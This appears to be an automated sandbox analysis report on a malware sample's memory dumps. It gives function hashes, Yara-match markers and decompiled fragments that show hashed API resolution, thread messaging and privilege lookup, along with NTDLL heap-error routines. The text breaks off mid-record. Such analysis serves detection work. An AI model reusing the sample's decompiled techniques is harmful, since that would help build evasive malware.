Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42cef5452f3c50f75ed5eafd572469a056d21a4d02d03acebe0b2b41d8e4adc3
Instruction ID: 12beb31a42e6f16600da33842f55526e3f0dbef1d29e9779d805a7a1b107bf25
Opcode Fuzzy Hash: 42cef5452f3c50f75ed5eafd572469a056d21a4d02d03acebe0b2b41d8e4adc3
Instruction Fuzzy Hash: 1690027120144402D200616A481471B000597D0382F61C021A5154555D86658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD966A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f277dd05afac6284ea5bfaa1fa7d8c897c2826d8e7d947ab3b779b1f6575ece8
Instruction ID: b9aa8de0274dfe570327d28b3635bee3ecea3486e57ab3d96cfc54f313cb2c58
Opcode Fuzzy Hash: f277dd05afac6284ea5bfaa1fa7d8c897c2826d8e7d947ab3b779b1f6575ece8
Instruction Fuzzy Hash: B590027120104802D280716A440465A000597D1381FA1C025A4015654DCA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD9A5A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d3ad400a02256c1823a8b4495c84d8814b12f56f0d4bee2931ea24e0b30f2da
Instruction ID: a799925c9a3b6b55b7310f0094a5e37ebe6b7cdb67038a9596307b0c01161d4f
Opcode Fuzzy Hash: 8d3ad400a02256c1823a8b4495c84d8814b12f56f0d4bee2931ea24e0b30f2da
Instruction Fuzzy Hash: 2C90026121184042D300657A4C14B17000597D0383F61C125A4144554CC9558861A561

Uniqueness

Uniqueness Score: -1.00%

Function 00AD97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD97AA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2e7d8abbf11f692f9c865922de9fa56f71954cc5ad7e17c9b0f13fc0eaeae76
Instruction ID: 0c2f40872d2acae7576e72831e90a96df8c033f0d42a532645e344cf749962f6
Opcode Fuzzy Hash: b2e7d8abbf11f692f9c865922de9fa56f71954cc5ad7e17c9b0f13fc0eaeae76
Instruction Fuzzy Hash: FA90026130104003D240716A54186164005E7E1381F61D021E4404554CD9558856A262

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD978A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f61cd37b52a2089f02786ea39214b54326ee7e66b46b0130b62f7ee400c5294
Instruction ID: d650d38159504c192e7a91b5f25d0f0636b51fe036a91ca88c680fd496a52b3b
Opcode Fuzzy Hash: 8f61cd37b52a2089f02786ea39214b54326ee7e66b46b0130b62f7ee400c5294
Instruction Fuzzy Hash: 7790026921304002D280716A540861A000597D1382FA1D425A4005558CC9558869A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD9FEA

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 468725d198022507069637aca72dee718064b9c872ea5e1e3f1d6884f8b0cd31
Instruction ID: 57d1b6642db8151fd4bdbab017cd2598b81618eaf71c4946527e2ef1484c5cd3
Opcode Fuzzy Hash: 468725d198022507069637aca72dee718064b9c872ea5e1e3f1d6884f8b0cd31
Instruction Fuzzy Hash: 3790027131118402D210616A8404716000597D1381F61C421A4814558D86D58891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD971A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db45eb921bfbdd039cee7a420ed994b46241c23369db4b3a407ff44e051c7392
Instruction ID: 3b26204582d5dd7030c9a573a1a5a39c6d6d610411b6e0fe2269be2f3466ebf6
Opcode Fuzzy Hash: db45eb921bfbdd039cee7a420ed994b46241c23369db4b3a407ff44e051c7392
Instruction Fuzzy Hash: 4290027120104402D20065AA5408656000597E0381F61D021A9014555EC6A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00407236, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00407236(void* __eflags, intOrPtr* _a4, long _a12) {
				void* _t5;
				int _t6;
				void* _t14;
				void* _t16;
				long _t18;
				void* _t20;
				int _t21;
				void* _t23;

				_pop(_t20);
				asm("insd");
				asm("frstor [ebx]");
				asm("aas");
				asm("adc [ebx-0x7a], ah");
				if(__eflags >= 0) {
					asm("rcl byte [edx-0x7d], 0xc6");
					asm("sbb al, 0x56"); // executed
					_t5 = E00409B50(__eflags); // executed
					_t6 = E00413E60(_t20, _t5, 0, 0, 0xc4e7b6d6);
					_t21 = _t6;
					__eflags = _t21;
					if(_t21 != 0) {
						_t18 = _a12;
						_t6 = PostThreadMessageW(_t18, 0x111, 0, 0); // executed
						__eflags = _t6;
						if(__eflags == 0) {
							_t6 =  *_t21(_t18, 0x8003, _t23 + (E004092B0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t6);
						}
					}
					return _t6;
				} else {
					_push(_t23);
					_t16 = E00419A00(_t14);
					if(_t16 == 0 || _t16 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t16;
					}
				}
			}

0x00407236
0x00407237
0x00407238
0x0040723a
0x0040723b
0x0040723e
0x004072b8
0x004072bc
0x004072be
0x004072ce
0x004072d3
0x004072d8
0x004072da
0x004072dd
0x004072ea
0x004072ec
0x004072ee
0x0040730b
0x0040730b
0x0040730d
0x00407312
0x00407240
0x00407240
0x00407248
0x0040724c
0x0040725f
0x00407262
0x00407256
0x0040725e
0x0040725e
0x0040724c

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Strings

3333, xrefs: 0040724E

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 3bd7e29bbea837acbc421b2fdf2eba9d724bddffdfd8f32bf4844cfc834c245e
Instruction ID: 42233abdd107220d8035a8c7f7fe94cf6866f68173efa0fd849e36a6436a6306
Opcode Fuzzy Hash: 3bd7e29bbea837acbc421b2fdf2eba9d724bddffdfd8f32bf4844cfc834c245e
Instruction Fuzzy Hash: 2C01FC31B8426536EA2565985D42FBA77584F41B25F08456FFE08FA2C1D568BC0142EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A05, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Strings

@P, xrefs: 00418A2F, 00418A3B

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID: @P
API String ID: 3899507212-4139428406
Opcode ID: ed68b200471594f1a20a47c205e6ecf4ca676beed89af90702fc053705e51577
Instruction ID: 31ebf812e3b37ec9ca67b9192a4eea9a6fe0cacc196ccdc2d4ced1d8e5b9e247
Opcode Fuzzy Hash: ed68b200471594f1a20a47c205e6ecf4ca676beed89af90702fc053705e51577
Instruction Fuzzy Hash: 6C01DFB52002496FCB14DF58DC90EEB77A9AF89318F00851AFD4893342C634E855CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188d7
0x004188e2
0x004188ed
0x004188f1

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED

Strings

F5A, xrefs: 004188E2, 004188EC

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t29;

				_t29 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t23 = _a4;
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				_t12 = E00409B50(_t29); // executed
				_t13 = E00413E60(_t23, _t12, 0, 0, 0xc4e7b6d6);
				_t24 = _t13;
				if(_t24 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t31 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t24(_t21, 0x8003, _t25 + (E004092B0(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407290
0x0040729f
0x004072a3
0x004072ae
0x004072b3
0x004072b8
0x004072bc
0x004072be
0x004072ce
0x004072d3
0x004072da
0x004072dd
0x004072ea
0x004072ec
0x004072ee
0x0040730b
0x0040730b
0x00000000
0x0040730d
0x00407312

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A51, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5d3c49ca205283dccf914e55f78b1880c14ba53bb6022647faf82628d961ab79
Instruction ID: a1518626d2bf0556b071064e1f65b08c73a696c2ec80a5bc641cebfa84e51dfc
Opcode Fuzzy Hash: 5d3c49ca205283dccf914e55f78b1880c14ba53bb6022647faf82628d961ab79
Instruction Fuzzy Hash: 5BE022B42042152BDB08DF1A8D85EBB7BA9EF81310F14895EFC899B203C034E80587B0

Uniqueness

Uniqueness Score: -1.00%

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AD9694

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
Instruction ID: f781954be2297d9b0edce2cd1316ec69c8dfbef58d2a3cd7478726b3d5bb8dab
Opcode Fuzzy Hash: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
Instruction Fuzzy Hash: CAB09B719014C5C5D711D7714608727790077D0741F26C062D1030655A4778C491F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B4B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

This failed because of error %Ix., xrefs: 00B4B446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B4B2DC
*** enter .exr %p for the exception record, xrefs: 00B4B4F1
write to, xrefs: 00B4B4A6
The resource is owned shared by %d threads, xrefs: 00B4B37E
<unknown>, xrefs: 00B4B27E, 00B4B2D1, 00B4B350, 00B4B399, 00B4B417, 00B4B48E
The instruction at %p referenced memory at %p., xrefs: 00B4B432
The instruction at %p tried to %s , xrefs: 00B4B4B6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B4B53F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B4B484
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B38F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B4B323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B4B305
The resource is owned exclusively by thread %p, xrefs: 00B4B374
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00B4B2F3
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B3D6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B4B39B
*** Resource timeout (%p) in %ws:%s, xrefs: 00B4B352
read from, xrefs: 00B4B4AD, 00B4B4B2
*** enter .cxr %p for the context, xrefs: 00B4B50D
The critical section is owned by thread %p., xrefs: 00B4B3B9
an invalid address, %p, xrefs: 00B4B4CF
a NULL pointer, xrefs: 00B4B4E0
*** An Access Violation occurred in %ws:%s, xrefs: 00B4B48F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B4B314
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B4B47D
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B4B476
*** then kb to get the faulting stack, xrefs: 00B4B51C
Go determine why that thread has not released the critical section., xrefs: 00B4B3C5
*** Inpage error in %ws:%s, xrefs: 00B4B418

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
Instruction ID: 1b7ba72583b4613e892393c43a27cb057c0761abd619c0923ef687f432768d7b
Opcode Fuzzy Hash: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
Instruction Fuzzy Hash: 2D81F275A40210FBCB21AA059C8AE7B3BA5EF56B51F4044C4F2086B2A7D371CE11EB72

Uniqueness

Uniqueness Score: -1.00%

Function 00B51C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00B51C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb8589c);
				E00A9B150("Heap error detected at %p (heap handle %p)\n",  *0xb858a0);
				_t27 =  *0xb85898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B51E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A9B150("Error code: %d - %s\n",  *0xb85898);
				_t113 =  *0xb858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter1: %p\n",  *0xb858a4);
				}
				_t115 =  *0xb858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter2: %p\n",  *0xb858a8);
				}
				_t117 =  *0xb858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter3: %p\n",  *0xb858ac);
				}
				_t119 =  *0xb858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb858b4);
					E00A9B150("Last known valid blocks: before - %p, after - %p\n",  *0xb858b0);
				} else {
					_t120 =  *0xb858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A9B150("Stack trace available at %p\n", 0xb858c0);
			}

0x00b51c10
0x00b51c16
0x00b51c1e
0x00b51c3d
0x00b51c3e
0x00b51c20
0x00b51c35
0x00b51c3a
0x00b51c44
0x00b51c55
0x00b51c5a
0x00b51c65
0x00b51c67
0x00000000
0x00b51c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b51c67
0x00b51cdc
0x00b51ce5
0x00b51d04
0x00b51d05
0x00b51ce7
0x00b51cfc
0x00b51d01
0x00b51d0b
0x00b51d17
0x00b51d1f
0x00b51d25
0x00b51d30
0x00b51d4f
0x00b51d50
0x00b51d32
0x00b51d47
0x00b51d4c
0x00b51d61
0x00b51d67
0x00b51d68
0x00b51d6e
0x00b51d79
0x00b51d98
0x00b51d99
0x00b51d7b
0x00b51d90
0x00b51d95
0x00b51daa
0x00b51db0
0x00b51db1
0x00b51db7
0x00b51dc2
0x00b51de1
0x00b51de2
0x00b51dc4
0x00b51dd9
0x00b51dde
0x00b51df3
0x00b51df9
0x00b51dfa
0x00b51e00
0x00b51e0a
0x00b51e13
0x00b51e32
0x00b51e33
0x00b51e15
0x00b51e2a
0x00b51e2f
0x00b51e39
0x00b51e4a
0x00b51e02
0x00b51e02
0x00b51e08
0x00000000
0x00000000
0x00b51e08
0x00b51e5b
0x00b51e7a
0x00b51e7b
0x00b51e5d
0x00b51e72
0x00b51e77
0x00b51e95

Strings

heap_failure_internal, xrefs: 00B51C6E
Stack trace available at %p, xrefs: 00B51E86
HEAP: , xrefs: 00B51C16, 00B51C3D, 00B51D04, 00B51D4F, 00B51D98, 00B51DE1, 00B51E32, 00B51E7A
heap_failure_buffer_underrun, xrefs: 00B51C9F
Error code: %d - %s, xrefs: 00B51D12
heap_failure_block_not_busy, xrefs: 00B51CA6
heap_failure_freelists_corruption, xrefs: 00B51CC9
heap_failure_invalid_argument, xrefs: 00B51CAD
heap_failure_invalid_allocation_type, xrefs: 00B51CB4
heap_failure_usage_after_free, xrefs: 00B51CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 00B51CD7
Parameter2: %p, xrefs: 00B51DA5
Parameter3: %p, xrefs: 00B51DEE
Parameter1: %p, xrefs: 00B51D5C
heap_failure_virtual_block_corruption, xrefs: 00B51C91
heap_failure_buffer_overrun, xrefs: 00B51C98
heap_failure_generic, xrefs: 00B51C7C
Heap error detected at %p (heap handle %p), xrefs: 00B51C50
heap_failure_unknown, xrefs: 00B51C75
heap_failure_entry_corruption, xrefs: 00B51C83
Last known valid blocks: before - %p, after - %p, xrefs: 00B51E45
heap_failure_multiple_entries_corruption, xrefs: 00B51C8A
heap_failure_cross_heap_operation, xrefs: 00B51CC2
heap_failure_listentry_corruption, xrefs: 00B51CD0
HEAP[%wZ]: , xrefs: 00B51C30, 00B51CF7, 00B51D42, 00B51D8B, 00B51DD4, 00B51E25, 00B51E6D

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
